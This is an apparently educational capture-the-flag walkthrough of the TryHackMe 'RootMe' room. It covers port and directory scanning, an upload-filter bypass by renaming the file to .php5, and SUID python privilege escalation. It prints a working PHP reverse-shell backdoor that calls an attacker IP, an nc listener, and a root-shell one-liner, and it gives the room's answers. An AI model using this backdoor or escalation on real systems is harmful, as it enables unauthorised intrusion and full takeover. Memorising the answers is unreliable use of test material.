RootMe is a bite sized WEB upload form and Linux privilege escalation exercise.
Task 1 Deploy the machine
In this task we start the target VM and we have to connect the TryHackMe VPN. Alternatively we can use the AttackBox.
Task 2 Reconnaissance
With running nmap we can see the open ports and we can answer the first three questions as well.
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
After visiting the target VM’s IP address we won’t see any interesting on the web server.
The next tool we use is gobuster in our toolset to look for hidden files and directories.
[2K/.html (Status: 403) [Size: 274]
[2K/uploads (Status: 301) [Size: 308] [--> http://10.10.3.2/uploads/]
[2K/css (Status: 301) [Size: 304] [--> http://10.10.3.2/css/]
[2K/js (Status: 301) [Size: 303] [--> http://10.10.3.2/js/]
[2K/panel (Status: 301) [Size: 306] [--> http://10.10.3.2/panel/]
[2K/.php (Status: 403) [Size: 274]
[2K/.html (Status: 403) [Size: 274]
[2K/server-status (Status: 403) [Size: 274]
Bingo! We can see an upload form on the /panel/ URL and we can list the uploads at the /uploads/ URL.
We can answer the rest of the questions.
Scan the machine, how many ports are open?
2
What version of Apache is running?
2.4.29
What service is running on port 22?
ssh
Find directories on the web server using the GoBuster tool.
What is the hidden directory?
/panel/
Task 3 Getting a shell
We have a web upload form, and we can see the uploads as well. Theoretically we can prepare a PHP file that opens a reverse shell to our hacking machine.
Let’s prepare a basic PHP backdoor!
<?php
$sock=fsockopen("<hacking machine tun0 IP>",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>
Now we have to upload it to the web server.
Unfortunately we run into an issue: we cannot upload PHP files. Let’s grab the easiest and fastest possible trick from our hat for this evasion: let’s rename the file to backdoor.php5!
It worked, the backdoor can be seen in the /uploads/ directory now from a web browser.
Before we run the backdoor, let’s prepare the listener on our hacking machine! A simple nc will make it.
nc -vnlp 4242
If we have done everything well, then we can look around and find the user.txt flag!
If we don’t find it first, then:
find / -name "user.txt" 2>/dev/null
Task 4 Privilege escalation
For privilege escalation as the first question suggests, we have to look for SUID tools. Let’s run a simple find and look for something interesting!
find / -perm -4000 -print 2>/dev/null
Search for files with SUID permission, which file is weird?
/usr/bin/python
Find a form to escalate your privileges.
Python can run shell code, we can use GTFOBins to check it. The following code will drop us in a privileged shell.
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Let’s check it!
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Now we can look around and find the root flag!
find / -name "root.txt" 2>/dev/null
Tom's IT Cafe 